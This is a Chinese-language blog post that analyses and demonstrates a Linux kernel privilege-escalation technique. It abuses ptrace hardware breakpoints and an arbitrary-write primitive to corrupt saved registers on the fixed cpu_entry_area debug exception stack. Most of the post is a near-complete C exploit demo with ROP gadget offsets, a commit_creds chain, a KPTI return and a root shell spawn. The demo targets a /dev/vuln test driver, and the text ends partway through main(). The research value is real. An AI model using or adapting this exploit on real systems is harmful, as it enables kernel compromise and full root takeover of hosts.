一种借助硬件断点的提权思路分析与演示

前文

原文来自P0的博客,是基于CVE-2022-42703写的利用。这个漏洞是Jann Horn在Linux内核的mm(memory management)子系统中发现的一个关于struct anon_vma的UAF漏洞,漏洞本身还是挺复杂的,我粗看了一遍也没有看得很明白(只能说菜)。

作者后续将这个漏洞通过cross page attack将struct anon_vma和pipe buffer制造overlap,再结合anon_vma本身的代码(folio_lock_anon_vma_read())将UAF转化成内核任意地址写的原语。需要注意,原文得到的任意地址写原语还附带非常致命的限制,比如写入的值会在很短时间内被恢复。

本文的重点即从得到内核任意地址写原语开始。

*Warning:下文中可能包含对P0原博客的粗糙翻译,有能力请直接看原文。

下文涉及内核源码时,均基于linux kernel 5.15.103

正文

先忘记原文的任意地址写原语的种种限制,假设我们有一个品相很好的任意写:

  1. 内核任意地址写8字节
  2. 可以无限次数触发
  3. 不会在短时间内被恢复

我们也会马上注意到一个问题,即此时还没有leak出KASLR,因此写modprobe_path之类的利用思路是不行的;且先不考虑想办法泄露堆地址做原语转化什么的事情,那能写哪里完成攻击?

Linux x86-64中,当CPU处理某些中断和异常时,它会切换到对应的栈中,并保存当时的寄存器值,这个栈被映射在一个静态且非随机化的虚拟地址中,不同的中断、异常类型有不同的栈。而这些栈存储在结构体struct cpu_entry_area的一个字段中。

既然说struct cpu_entry_area是静态且非随机化的,那它在什么位置呢?不妨看看内核函数是如何获取这个结构体位置的,在get_cpu_entry_area()中实现:

// >>> arch/x86/mm/cpu_entry_area.c:25
/* 25 */ noinstr struct cpu_entry_area *get_cpu_entry_area(int cpu)
/* 26 */ {
/* 27 */ unsigned long va = CPU_ENTRY_AREA_PER_CPU + cpu * CPU_ENTRY_AREA_SIZE;
/* 28 */ BUILD_BUG_ON(sizeof(struct cpu_entry_area) % PAGE_SIZE != 0);
/* 29 */
/* 30 */ return (struct cpu_entry_area *) va;
/* 31 */ }

将宏展开,会得到如下结果:

va = (((-4UL) << 39) + ((1UL) << 12)) + cpu * (sizeof(struct cpu_entry_area));

如果还嫌结果不够直白,可以手算一下:(-4UL) << 39 即 0xfffffe0000000000,再加上 (1UL) << 12 即 0x1000;也可以直接从编译完的vmlinux中看。在我编译的内核中,CPU-0的cpu_entry_area也就是0xfffffe0000001000这个地址了:

那处理中断的栈在结构体中的什么位置呢?注意到struct cpu_entry_area中的estacks字段,它存放了IST(Interrupt Stack Table 中断栈表)项中所用到的栈:

// >>> arch/x86/include/asm/cpu_entry_area.h:82
/* 82 */ /*
/* 83 */ * cpu_entry_area is a percpu region that contains things needed by the CPU
/* 84 */ * and early entry/exit code. Real types aren't used for all fields here
/* 85 */ * to avoid circular header dependencies.
/* 86 */ *
/* 87 */ * Every field is a virtual alias of some other allocated backing store.
/* 88 */ * There is no direct allocation of a struct cpu_entry_area.
/* 89 */ */
/* 90 */ struct cpu_entry_area {
------
/* 114 */ #ifdef CONFIG_X86_64
/* 115 */ /*
/* 116 */ * Exception stacks used for IST entries with guard pages.
/* 117 */ */
/* 118 */ struct cea_exception_stacks estacks;
/* 119 */ #endif
------
/* 130 */ };

struct cea_exception_stacks中针对每一种类型都有对应的栈:

// >>> arch/x86/include/asm/cpu_entry_area.h:19
/* 19 */ /* Macro to enforce the same ordering and stack sizes */
/* 20 */ #define ESTACKS_MEMBERS(guardsize, optional_stack_size) \
/* 21 */ char DF_stack_guard[guardsize]; \
/* 22 */ char DF_stack[EXCEPTION_STKSZ]; \
/* 23 */ char NMI_stack_guard[guardsize]; \
/* 24 */ char NMI_stack[EXCEPTION_STKSZ]; \
/* 25 */ char DB_stack_guard[guardsize]; \
/* 26 */ char DB_stack[EXCEPTION_STKSZ]; \
/* 27 */ char MCE_stack_guard[guardsize]; \
/* 28 */ char MCE_stack[EXCEPTION_STKSZ]; \
/* 29 */ char VC_stack_guard[guardsize]; \
/* 30 */ char VC_stack[optional_stack_size]; \
/* 31 */ char VC2_stack_guard[guardsize]; \
/* 32 */ char VC2_stack[optional_stack_size]; \
/* 33 */ char IST_top_guard[guardsize]; \
------
/* 40 */ /* The effective cpu entry area mapping with guard pages. */
/* 41 */ struct cea_exception_stacks {
/* 42 */ ESTACKS_MEMBERS(PAGE_SIZE, EXCEPTION_STKSZ)
/* 43 */ };

这些栈通常用于从用户态进入内核态的入口处,但它们也被用于在内核态处理异常。这些栈在tss_setup_ist()中被注册到对应的IST项:

// >>> arch/x86/kernel/cpu/common.c:2006
/* 2006 */ static inline void tss_setup_ist(struct tss_struct *tss)
/* 2007 */ {
/* 2008 */ /* Set up the per-CPU TSS IST stacks */
/* 2009 */ tss->x86_tss.ist[IST_INDEX_DF] = __this_cpu_ist_top_va(DF);
/* 2010 */ tss->x86_tss.ist[IST_INDEX_NMI] = __this_cpu_ist_top_va(NMI);
/* 2011 */ tss->x86_tss.ist[IST_INDEX_DB] = __this_cpu_ist_top_va(DB);
/* 2012 */ tss->x86_tss.ist[IST_INDEX_MCE] = __this_cpu_ist_top_va(MCE);
/* 2013 */ /* Only mapped when SEV-ES is active */
/* 2014 */ tss->x86_tss.ist[IST_INDEX_VC] = __this_cpu_ist_top_va(VC);
/* 2015 */ }

在x86-64中,IST(Interrupt Stack Table 中断栈表)有7个per-cpu的入口,其中有诸如Double Fault、NMI、DEBUG等中断:

// >>> arch/x86/include/asm/page_64_types.h:24
/* 24 */ /*
/* 25 */ * The index for the tss.ist[] array. The hardware limit is 7 entries.
/* 26 */ */
/* 27 */ #define IST_INDEX_DF 0
/* 28 */ #define IST_INDEX_NMI 1
/* 29 */ #define IST_INDEX_DB 2
/* 30 */ #define IST_INDEX_MCE 3
/* 31 */ #define IST_INDEX_VC 4

中断所对应的函数在def_idts数组中声明,其中DEBUG对应的处理函数为asm_exc_debug():

// >>> arch/x86/kernel/idt.c:73
/* 73 */ /*
/* 74 */ * The default IDT entries which are set up in trap_init() before
/* 75 */ * cpu_init() is invoked. Interrupt stacks cannot be used at that point and
/* 76 */ * the traps which use them are reinitialized with IST after cpu_init() has
/* 77 */ * set up TSS.
/* 78 */ */
/* 79 */ static const __initconst struct idt_data def_idts[] = {
------
/* 100 */ ISTG(X86_TRAP_DB, asm_exc_debug, IST_INDEX_DB),
------
/* 116 */ };

函数声明处:

// >>> arch/x86/include/asm/idtentry.h:602
/* 602 */ /* #DB */
/* 603 */ #ifdef CONFIG_X86_64
/* 604 */ DECLARE_IDTENTRY_DEBUG(X86_TRAP_DB, exc_debug);

// 将宏展开后得到:

void asm_exc_debug(void);
void xen_asm_exc_debug(void);
void exc_debug(struct pt_regs *regs);
void noist_exc_debug(struct pt_regs *regs);

函数实现处:

// >>> arch/x86/kernel/traps.c:1026
/* 1026 */ /* IST stack entry */
/* 1027 */ DEFINE_IDTENTRY_DEBUG(exc_debug)
/* 1028 */ {
/* 1029 */ exc_debug_kernel(regs, debug_read_clear_dr6());
/* 1030 */ }
/* 1031 */
/* 1032 */ /* User entry, runs on regular task stack */
/* 1033 */ DEFINE_IDTENTRY_DEBUG_USER(exc_debug)
/* 1034 */ {
/* 1035 */ exc_debug_user(regs, debug_read_clear_dr6());
/* 1036 */ }

// 将宏展开后得到:

/* IST stack entry */
__attribute__((__noinline__)) __attribute__((no_instrument_function))
__attribute((__section__(".noinstr.text")))
__attribute__((__no_profile_instrument_function__)) void
exc_debug(struct pt_regs *regs)
{
exc_debug_kernel(regs, debug_read_clear_dr6());
}

/* User entry, runs on regular task stack */
__attribute__((__noinline__)) __attribute__((no_instrument_function))
__attribute((__section__(".noinstr.text")))
__attribute__((__no_profile_instrument_function__)) void
noist_exc_debug(struct pt_regs *regs)
{
exc_debug_user(regs, debug_read_clear_dr6());
}

为什么我们要看DEBUG中断而不是其他的几种中断呢?因为只需在用户态使用ptrace设置硬件断点,再让该断点命中,就能触发DEBUG中断;而且硬件断点既可以在用户态命中,也可以在内核态命中,因此它是后续利用中最理想的选择。

我们可以编写如下函数来给一个内存地址设置1字节的读写硬件断点(注意这是x86-64下的实现),对应的CPU寄存器可以参考wiki:

#include <sys/ptrace.h>
#include <sys/user.h>

/* Byte offset of debug register `num` inside the tracee's `struct user` area,
 * in the form PTRACE_POKEUSER expects for its address argument. */
#define DR_OFFSET(num) ((void *)(&((struct user *)0)->u_debugreg[num]))

/*
 * Arm a 1-byte read/write hardware breakpoint at `addr` in the traced
 * process `pid` (x86-64 only).
 *
 * DR0 receives the watched address and DR7 the control word.
 * Any ptrace() failure aborts the program through die().
 */
void create_hbp(pid_t pid, void *addr) {
    /* DR7 control word, assembled from its individual fields. */
    const unsigned long dr7_enable_dr0 = 1UL << 0;  /* enable the DR0 breakpoint */
    const unsigned long dr7_exact = 1UL << 8;       /* stop on the faulting instruction */
    const unsigned long dr7_rw_data = (1UL << 16) | (1UL << 17); /* data read or write */
    const unsigned long dr7_value = dr7_enable_dr0 | dr7_exact | dr7_rw_data;

    /* DR0: the address to watch. */
    long rc = ptrace(PTRACE_POKEUSER, pid, DR_OFFSET(0), addr);
    if (rc != 0) {
        die("create hbp ptrace dr0: %m");
    }

    /* DR7: switch the breakpoint on. */
    rc = ptrace(PTRACE_POKEUSER, pid, DR_OFFSET(7), (void *)dr7_value);
    if (rc != 0) {
        die("create hbp ptrace dr7: %m");
    }
}

之后被ptrace的子进程可以使用如下两种方式来触发硬件断点:在用户态触发的硬件断点会进入exc_debug_user()函数处理,而类似uname()中使用copy_from/to_user()时触发的硬件断点会进入exc_debug_kernel()函数处理:

// 触发内核态函数 `exc_debug_user()`
*(char *)buf = 1;

// 在内核态使用`copy_from/to_user()`时触发内核态函数 `exc_debug_kernel()`
uname((void *)buf);

(由于cpu_entry_area是per-cpu的,因此下面调试时我们用于触发断点的进程被锁在CPU-0中)

我们到内核中实际调试一下:在exc_debug_kernel()处下断点,将参数regs打印出来,可以发现ip指向copy_to_user()内部实际执行拷贝的汇编指令,其中di为用户态指针,si为内核态指针,数据从si拷贝到di。拷贝时先以8字节为单位进行,cx中保存了还需拷贝的次数。(一个细节是,触发硬件断点时rep movs指令已经完成了一次拷贝,也就是8个字节,因此此时di已经是0x12340008。)

pwndbg> bt
#0 exc_debug_kernel (dr6=1, regs=0xfffffe0000010f58) at arch/x86/kernel/traps.c:892
#1 exc_debug (regs=0xfffffe0000010f58) at arch/x86/kernel/traps.c:1029
#2 0xffffffff82000c2a in asm_exc_debug () at ./arch/x86/include/asm/idtentry.h:604
#3 0x0000000000000000 in ?? ()
pwndbg> p/x * regs
$1 = {
r15 = 0x0,
r14 = 0x0,
r13 = 0x0,
r12 = 0xffff888005589780,
bp = 0xffffc9000020fce0,
bx = 0x12340000,
r11 = 0x0,
r10 = 0x0,
r9 = 0x0,
r8 = 0x0,
ax = 0x12340186,
cx = 0x2f,
dx = 0x6,
si = 0xffffc9000020fcfa,
di = 0x12340008,
orig_ax = 0xffffffffffffffff,
ip = 0xffffffff816e039c,
cs = 0x10,
flags = 0x40206,
sp = 0xffffc9000020fcd8,
ss = 0x18
}
pwndbg> x/4i 0xffffffff816e039c
0xffffffff816e039c <copy_user_generic_string+44>: rep movs QWORD PTR es:[rdi],QWORD PTR ds:[rsi]
0xffffffff816e039f <copy_user_generic_string+47>: mov ecx,edx
0xffffffff816e03a1 <copy_user_generic_string+49>: rep movs BYTE PTR es:[rdi],BYTE PTR ds:[rsi]
0xffffffff816e03a3 <copy_user_generic_string+51>: xor eax,eax
pwndbg> tele regs.sp
00:0000│ 0xffffc9000020fcd8 —▸ 0xffffffff816833b0 (_copy_to_user+32) ◂— mov eax, eax
01:0008│ 0xffffc9000020fce0 —▸ 0xffffc9000020fe90 —▸ 0xffffc9000020fea0 —▸ 0xffffc9000020ff48 ◂— 0x0
02:0010│ 0xffffc9000020fce8 —▸ 0xffffffff810e0a93 (__do_sys_newuname+147) ◂— test rax, rax
03:0018│ 0xffffc9000020fcf0 ◂— 0x78756e694c0004
04:0020│ 0xffffc9000020fcf8 ◂— 0x0

而这个regs参数,正处于struct cpu_entry_area中的DEBUG Exception stack中:

pwndbg> p/x & regs.cx
$1 = 0xfffffe0000010fb0
pwndbg> p/x & ((struct cpu_entry_area*)0xfffffe0000001000)->estacks.DB_stack
$2 = 0xfffffe000000f000
pwndbg> p/x sizeof(((struct cpu_entry_area*)0xfffffe0000001000)->estacks.DB_stack)
$3 = 0x2000
pwndbg> hexdump 0xfffffe000000f000 0x2000
+0000 0xfffffe000000f000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
... ↓ skipped 495 identical lines (7920 bytes)
+1f00 0xfffffe0000010f00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+1f10 0xfffffe0000010f10 94 f5 e2 81 ff ff ff ff 01 00 00 00 00 00 00 00
+1f20 0xfffffe0000010f20 00 79 e0 f5 d8 44 6e 9d 01 00 00 00 00 00 00 00
+1f30 0xfffffe0000010f30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+1f40 0xfffffe0000010f40 00 60 84 1f 00 00 00 00 59 0f 01 00 00 fe ff ff
+1f50 0xfffffe0000010f50 2a 0c 00 82 ff ff ff ff 00 00 00 00 00 00 00 00
+1f60 0xfffffe0000010f60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+1f70 0xfffffe0000010f70 80 c6 a9 1f 80 88 ff ff 68 bc 4f 00 00 c9 ff ff
+1f80 0xfffffe0000010f80 00 00 34 12 00 00 00 00 00 00 00 00 00 00 00 00
+1f90 0xfffffe0000010f90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+1fa0 0xfffffe0000010fa0 00 00 00 00 00 00 00 00 86 01 34 12 00 00 00 00
+1fb0 0xfffffe0000010fb0 2f 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00
+1fc0 0xfffffe0000010fc0 82 bc 4f 00 00 c9 ff ff 08 00 34 12 00 00 00 00
+1fd0 0xfffffe0000010fd0 ff ff ff ff ff ff ff ff 9c 03 6e 81 ff ff ff ff
+1fe0 0xfffffe0000010fe0 10 00 00 00 00 00 00 00 06 02 04 00 00 00 00 00
+1ff0 0xfffffe0000010ff0 60 bc 4f 00 00 c9 ff ff 18 00 00 00 00 00 00 00

因此这个 regs.cx 就是在不知道KASLR时一个非常好的攻击对象。

再来看一下uname调用时的代码,copy_to_user的来源是内核栈上的一个临时对象:

// >>> kernel/sys.c:1280
/* 1280 */ SYSCALL_DEFINE1(newuname, struct new_utsname __user *, name)
/* 1281 */ {
/* 1282 */ struct new_utsname tmp;
/* 1283 */
/* 1284 */ down_read(&uts_sem);
/* 1285 */ memcpy(&tmp, utsname(), sizeof(tmp));
/* 1286 */ up_read(&uts_sem);
/* 1287 */ if (copy_to_user(name, &tmp, sizeof(tmp)))
/* 1288 */ return -EFAULT;

如果此时另一个进程利用漏洞在victim进程还处于处理copy_to_user时触发的硬件断点中断时修改了regs.cx的值,中断处理完毕重新将栈切换回copy_to_user,由于cx值被修改,会拷贝比原先多的内容到用户态buffer,从而泄露内核栈上的stack canary、函数返回地址等。

如P0博客中这张图所示:

举一反三,如果找到一个目标地址为栈上临时变量的copy_from_user调用,通过硬件断点和漏洞攻击就能将更多的数据拷贝到内核栈上,从而制造出ROP攻击;在P0的博客中用到了prctl中的一个子函数:

// >>> kernel/sys.c:2274
/* 2274 */ SYSCALL_DEFINE5(prctl, int, option, unsigned long, arg2, unsigned long, arg3,
/* 2275 */ unsigned long, arg4, unsigned long, arg5)
/* 2276 */ {
------
/* 2286 */ switch (option) {
------
/* 2417 */ case PR_SET_MM:
// 调用 `prctl_set_mm()`
/* 2418 */ error = prctl_set_mm(arg2, arg3, arg4, arg5);
/* 2419 */ break;

// >>> kernel/sys.c:2094
/* 2094 */ static int prctl_set_mm(int opt, unsigned long addr,
/* 2095 */ unsigned long arg4, unsigned long arg5)
/* 2096 */ {
------
/* 2111 */ #ifdef CONFIG_CHECKPOINT_RESTORE
/* 2112 */ if (opt == PR_SET_MM_MAP || opt == PR_SET_MM_MAP_SIZE)
// 调用 `prctl_set_mm_map()`
/* 2113 */ return prctl_set_mm_map(opt, (const void __user *)addr, arg4);

// >>> kernel/sys.c:1955
/* 1955 */ #ifdef CONFIG_CHECKPOINT_RESTORE
/* 1956 */ static int prctl_set_mm_map(int opt, const void __user *addr, unsigned long data_size)
/* 1957 */ {
// 目标栈上临时对象
/* 1958 */ struct prctl_mm_map prctl_map = { .exe_fd = (u32)-1, };
------
// 调用copy_from_user,结合任意地址写原语和硬件断点,做到栈溢出ROP攻击
/* 1973 */ if (copy_from_user(&prctl_map, addr, sizeof(prctl_map)))
/* 1974 */ return -EFAULT;
/* 1975 */
// 对prctl_map对象内容进行校验,失败后快速返回触发ROP,不多调用函数
/* 1976 */ error = validate_prctl_map_addr(&prctl_map);
/* 1977 */ if (error)
/* 1978 */ return error;

总结下攻击流程:

  1. 父进程fork出子进程victim
  2. 父进程ptrace victim,父进程给victim设置硬件断点
  3. 父进程fork出子进程trigger,循环触发任意地址写原语修改DEBUG Exception stack中的cx寄存器值
  4. victim进程循环调用uname syscall,并检查buffer中是否发现stack leak,如果发现就发送给父进程
  5. 父进程拿着stack leak编写出ROP代码发送给victim
  6. victim进程循环调用prctl syscall触发目标copy_from_user,直到发生栈溢出ROP提权。

Exploit Demo

// =-=-=-=-=-=-=-= INCLUDE =-=-=-=-=-=-=-=
#define _GNU_SOURCE

#include <assert.h>
#include <fcntl.h>
#include <poll.h>
#include <sched.h>
#include <signal.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <sys/ptrace.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/user.h>
#include <sys/utsname.h>
#include <sys/wait.h>
#include <syscall.h>
#include <unistd.h>

// =-=-=-=-=-=-=-= DEFINE =-=-=-=-=-=-=-=

/* ANSI escape sequences used to colour log output. */
#define COLOR_GREEN "\033[32m"
#define COLOR_RED "\033[31m"
#define COLOR_YELLOW "\033[33m"
#define COLOR_DEFAULT "\033[0m"

/*
 * Shared backend for the log macros below: writes one line to fd 2 in the
 * form `<head> <file>:<line> <message>\n<tail>`. `head` and `tail` must be
 * string literals because they are pasted into the format string.
 */
#define LOG_EMIT(head, tail, fmt, ...)                                      \
    dprintf(2, head " %s:%d " fmt "\n" tail, __FILE__, __LINE__,           \
            ##__VA_ARGS__)

/* Debug (uncoloured), info (green), warning (yellow) and error (red). */
#define logd(fmt, ...) LOG_EMIT("[*]", "", fmt, ##__VA_ARGS__)
#define logi(fmt, ...)                                                      \
    LOG_EMIT(COLOR_GREEN "[+]", COLOR_DEFAULT, fmt, ##__VA_ARGS__)
#define logw(fmt, ...)                                                      \
    LOG_EMIT(COLOR_YELLOW "[!]", COLOR_DEFAULT, fmt, ##__VA_ARGS__)
#define loge(fmt, ...)                                                      \
    LOG_EMIT(COLOR_RED "[-]", COLOR_DEFAULT, fmt, ##__VA_ARGS__)

/* Log an error, report the line of the call site, and exit with status 1. */
#define die(fmt, ...)                                                       \
    do {                                                                    \
        loge(fmt, ##__VA_ARGS__);                                           \
        loge("Exit at line %d", __LINE__);                                  \
        exit(1);                                                            \
    } while (0)

/* Fixed user-space scratch mapping; the victim's hardware breakpoint is placed
 * at its first byte and it doubles as the buffer exchanged over the pipes. */
#define GLOBAL_MMAP_ADDR ((char *)(0x12340000))
#define GLOBAL_MMAP_LENGTH (0x2000)

// ROP stuff
/* Indices below are in 64-bit words into the `rop` array built in main(). */
#define ROP_START_OFF (0x44) /* first word of the chain */
#define CANARY_OFF (0x3d)    /* word that receives the leaked canary */
#define ROP_CNT (0x80)       /* capacity of the chain, in words */

/*
 * Translate an image-relative offset into an address using the `kbase`
 * variable that must be in scope at the point of use. The argument is
 * parenthesised so that expressions such as o(a << b) evaluate as intended.
 * NOTE(review): every offset below is presumably specific to the author's
 * own kernel build -- confirm against the target vmlinux.
 */
#define o(x) (kbase + (x))
#define pop_rdi o(0xb26a0)
#define pop_rdx o(0xa9eb57)
#define pop_rcx o(0x3468c3)
#define bss o(0x2595000)
#define dl_to_rdi o(0x20dd24) // mov byte ptr [rdi], dl ; ret
#define push_rax_jmp_qword_rcx o(0x4d6870) // push rax ; jmp qword ptr [rcx]
#define commit_creds o(0xf8240)
#define prepare_kernel_cred o(0xf8520)
#define kpti_trampoline \
    o(0x10010e6) // in swapgs_restore_regs_and_return_to_usermode
#define somewhere_writable (bss)

// =-=-=-=-=-=-=-= GLOBAL VAR =-=-=-=-=-=-=-=

/* User-mode register state captured by init_tf_work() and used as the
 * return-to-user frame at the end of the ROP chain. */
unsigned long user_cs;
unsigned long user_ss;
unsigned long user_eflags;
unsigned long user_sp;
unsigned long user_ip;

/* Argument block handed to the /dev/vuln ioctl by arb_write(). */
struct typ_cmd {
    uint64_t addr; /* target address */
    uint64_t val;  /* value to store */
};

/* File descriptor of /dev/vuln, opened in do_init(). */
int vuln_fd;

/* PIDs of the two forked helpers: the traced victim and the writer. */
pid_t child;
pid_t trigger;

/* sync_pipe[0]: parent -> child (ROP payload);
 * sync_pipe[1]: child -> parent (leaked buffer). */
int sync_pipe[2][2];

// =-=-=-=-=-=-=-= FUNCTION =-=-=-=-=-=-=-=

/*
 * User-mode landing point: init_tf_work() stores this function's address in
 * user_ip. If the process is running as uid 0 it replaces itself with
 * /bin/sh; otherwise it aborts through die().
 *
 * This function never returns. It is entered without a caller frame, so an
 * exec failure is reported and the process exits rather than falling off the
 * end of the function.
 */
void get_shell() {
    int uid = getuid();

    if (uid != 0) {
        die("gain root failed, uid: %d", uid);
    }

    logi("root get!!");
    /* The variadic sentinel must be a char pointer, not a bare NULL. */
    execl("/bin/sh", "sh", (char *)NULL);

    /* execl() only returns on failure. */
    die("execl /bin/sh: %m");
}

void init_tf_work(void) {
asm("movq %%cs, %0\n"
"movq %%ss, %1\n"
"movq %%rsp, %3\n"
"pushfq\n"
"popq %2\n"
: "=r"(user_cs), "=r"(user_ss), "=r"(user_eflags), "=r"(user_sp)
:
: "memory");

user_ip = (uint64_t)&get_shell;
user_sp = 0xf000 +
(uint64_t)mmap(0, 0x10000, 6, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
}

/*
 * Restrict the calling thread to the single CPU `cpu_idx`.
 * Aborts through die() if the affinity cannot be applied.
 */
void bind_cpu(int cpu_idx) {
    cpu_set_t mask;

    CPU_ZERO(&mask);
    CPU_SET(cpu_idx, &mask);

    /* pid 0 means "the calling thread". */
    int rc = sched_setaffinity(0, sizeof(mask), &mask);
    if (rc != 0) {
        die("sched_setaffinity: %m");
    }
}

/*
 * Write a classic hex + ASCII dump of `size` bytes at `data` to fd 2.
 *
 * Each row shows 16 bytes as two groups of eight hex pairs, followed by
 * `| <ascii>` where non-printable bytes are shown as '.'. A short final row
 * is padded so that its ASCII column lines up with the full rows above it.
 * Nothing is printed when `size` is 0.
 */
void hexdump(const void *data, size_t size) {
    const unsigned char *bytes = data;
    char ascii[17];

    ascii[16] = '\0';
    for (size_t i = 0; i < size; ++i) {
        const unsigned char c = bytes[i];
        const size_t col = (i + 1) % 16; /* bytes on this row so far; 0 = full */
        const bool last = (i + 1 == size);

        dprintf(2, "%02X ", c);
        ascii[i % 16] = (c >= ' ' && c <= '~') ? (char)c : '.';

        /* Only group boundaries and the final byte need extra output. */
        if ((i + 1) % 8 != 0 && !last) {
            continue;
        }

        dprintf(2, " ");
        if (col == 0) {
            dprintf(2, "| %s \n", ascii);
        } else if (last) {
            ascii[col] = '\0';
            /* The separator after the eighth byte was not printed yet. */
            if (col <= 8) {
                dprintf(2, " ");
            }
            /* Each missing byte occupies three columns ("XX "). */
            for (size_t j = col; j < 16; ++j) {
                dprintf(2, "   ");
            }
            dprintf(2, "| %s \n", ascii);
        }
    }
}

/* Byte offset of debug register `num` inside the tracee's `struct user` area,
 * in the form PTRACE_POKEUSER expects for its address argument. */
#define DR_OFFSET(num) ((void *)(&((struct user *)0)->u_debugreg[num]))

/*
 * Arm a 1-byte read/write hardware breakpoint at `addr` in the traced
 * process `pid` (x86-64 only).
 *
 * DR0 receives the watched address and DR7 the control word.
 * Any ptrace() failure aborts the program through die().
 */
void create_hbp(pid_t pid, void *addr) {
    /* DR7 control word, assembled from its individual fields. */
    const unsigned long dr7_enable_dr0 = 1UL << 0;  /* enable the DR0 breakpoint */
    const unsigned long dr7_exact = 1UL << 8;       /* stop on the faulting instruction */
    const unsigned long dr7_rw_data = (1UL << 16) | (1UL << 17); /* data read or write */
    const unsigned long dr7_value = dr7_enable_dr0 | dr7_exact | dr7_rw_data;

    /* DR0: the address to watch. */
    long rc = ptrace(PTRACE_POKEUSER, pid, DR_OFFSET(0), addr);
    if (rc != 0) {
        die("create hbp ptrace dr0: %m");
    }

    /* DR7: switch the breakpoint on. */
    rc = ptrace(PTRACE_POKEUSER, pid, DR_OFFSET(7), (void *)dr7_value);
    if (rc != 0) {
        die("create hbp ptrace dr7: %m");
    }
}

void arb_write(int fd, uint64_t addr, uint64_t val) {
struct typ_cmd cmd = {addr, val};
ioctl(fd, 0, &cmd);
}

/*
 * One-time setup performed before any fork():
 *   - capture the user-mode register state (init_tf_work),
 *   - open /dev/vuln into vuln_fd,
 *   - map the shared scratch buffer at GLOBAL_MMAP_ADDR,
 *   - create both synchronisation pipes.
 * Any failure aborts through die().
 */
void do_init() {
    logd("do init ...");
    init_tf_work();

    vuln_fd = open("/dev/vuln", O_RDONLY);
    if (vuln_fd < 0) {
        die("open vuln_fd: %m");
    }

    // global mmap
    void *p = mmap(GLOBAL_MMAP_ADDR, GLOBAL_MMAP_LENGTH, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED) {
        die("mmap: %m");
    }
    /* Without MAP_FIXED the address is only a hint, but the rest of the
     * program dereferences GLOBAL_MMAP_ADDR directly, so insist on it. */
    if (p != (void *)GLOBAL_MMAP_ADDR) {
        die("mmap: got %p instead of the requested %p", p,
            (void *)GLOBAL_MMAP_ADDR);
    }

    if (pipe(sync_pipe[0])) {
        die("pipe: %m");
    }
    if (pipe(sync_pipe[1])) {
        die("pipe: %m");
    }
}

/*
 * Body of the traced victim process. Never returns.
 *
 * The process pins itself to CPU 0, requests tracing by its parent, and then
 * loops: it stops itself with SIGSTOP and, once resumed, performs the action
 * of the current step:
 *   step 0 - call uname() into the watched buffer and scan the words past
 *            the end of `struct utsname`; on the first non-zero word the
 *            whole buffer is sent to the parent and the step advances;
 *   step 1 - receive the payload from the parent into the same buffer;
 *   step 2 - call prctl(PR_SET_MM, PR_SET_MM_MAP, ...) with that buffer.
 * Pipe transfer failures abort through die().
 */
void fn_child() {
    /* Exclusive upper bound, in 64-bit words, of the region scanned for
     * leaked data. */
    enum { LEAK_SCAN_END = 100 };

    logd("child MUST bind to cpu-0");
    bind_cpu(0);

    char *name_buf = (char *)GLOBAL_MMAP_ADDR;
    memset(GLOBAL_MMAP_ADDR, 0, GLOBAL_MMAP_LENGTH);

    // call ptrace
    if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) != 0) {
        die("ptrace PTRACE_TRACEME: %m");
    }

    /* Number of 64-bit words a legitimate uname() result can occupy. */
    const size_t skip_cnt =
        (sizeof(struct utsname) + sizeof(uint64_t) - 1) / sizeof(uint64_t);
    const uint64_t *words = (const uint64_t *)name_buf;

    int step = 0;
    for (;;) {
        // halt, and wait to be told to hit watchpoint
        raise(SIGSTOP);

        switch (step) {
        case 0: {
            // trigger hw_breakpoint and leak data from stack
#if (0)
            *(char *)name_buf = 1; // trigger `exc_debug_user()`
#else
            uname((void *)name_buf); // trigger `exc_debug_kernel()`
#endif
            // check if data leaked
            for (size_t i = skip_cnt; i < LEAK_SCAN_END; i++) {
                if (words[i]) {
                    logi("child: FOUND kernel stack leak !!");
                    ssize_t sent = write(sync_pipe[1][1], GLOBAL_MMAP_ADDR,
                                         GLOBAL_MMAP_LENGTH);
                    if (sent != GLOBAL_MMAP_LENGTH) {
                        die("child: send leak to parent failed (wrote %zd): %m",
                            sent);
                    }
                    step++;
                    break;
                }
            }
        } break;
        case 1: {
            // build ROP
            logd("child: waiting to recv rop gadget ...");
            ssize_t got =
                read(sync_pipe[0][0], GLOBAL_MMAP_ADDR, GLOBAL_MMAP_LENGTH);
            if (got <= 0) {
                die("child: recv rop gadget failed (read %zd): %m", got);
            }
            logd("child: recv rop gadget");
            step++;
        } break;
        case 2: {
            // ROP attack
            prctl(PR_SET_MM, PR_SET_MM_MAP, GLOBAL_MMAP_ADDR,
                  sizeof(struct prctl_mm_map), 0);
        } break;
        default:
            break;
        }
    }
}

/* Address of the saved `cx` slot on CPU 0's debug exception stack, as
 * observed in the author's debugging session (build-specific). */
#define CPU_0_cpu_entry_area_DB_STACK_rcx_loc (0xfffffe0000010fb0)
/* Convert a byte count into a count of 8-byte units. */
#define OOB_SIZE(x) ((x) / 8)

/*
 * Body of the writer process. Never returns.
 *
 * Pins itself to CPU 1, then repeatedly uses arb_write() to store
 * OOB_SIZE(0x400) at CPU_0_cpu_entry_area_DB_STACK_rcx_loc.
 */
void fn_trigger() {
    logd("trigger: bind trigger to other cpu, e.g. cpu-1");
    bind_cpu(1);

    logd("trigger: modify rcx in cpu-0's `cpu_entry_area` DB_STACK infinitely");
    while (1) {
        arb_write(vuln_fd, CPU_0_cpu_entry_area_DB_STACK_rcx_loc,
                  OOB_SIZE(0x400));
    }
}

/*
 * Entry point: coordinates the three processes of the demo.
 *
 *  1. do_init(), then fork the victim (fn_child) and wait for its first stop.
 *  2. Set PTRACE_O_EXITKILL on the victim and arm the hardware breakpoint on
 *     GLOBAL_MMAP_ADDR.
 *  3. Fork the writer (fn_trigger).
 *  4. Resume the victim repeatedly until it sends a leaked buffer over
 *     sync_pipe[1].
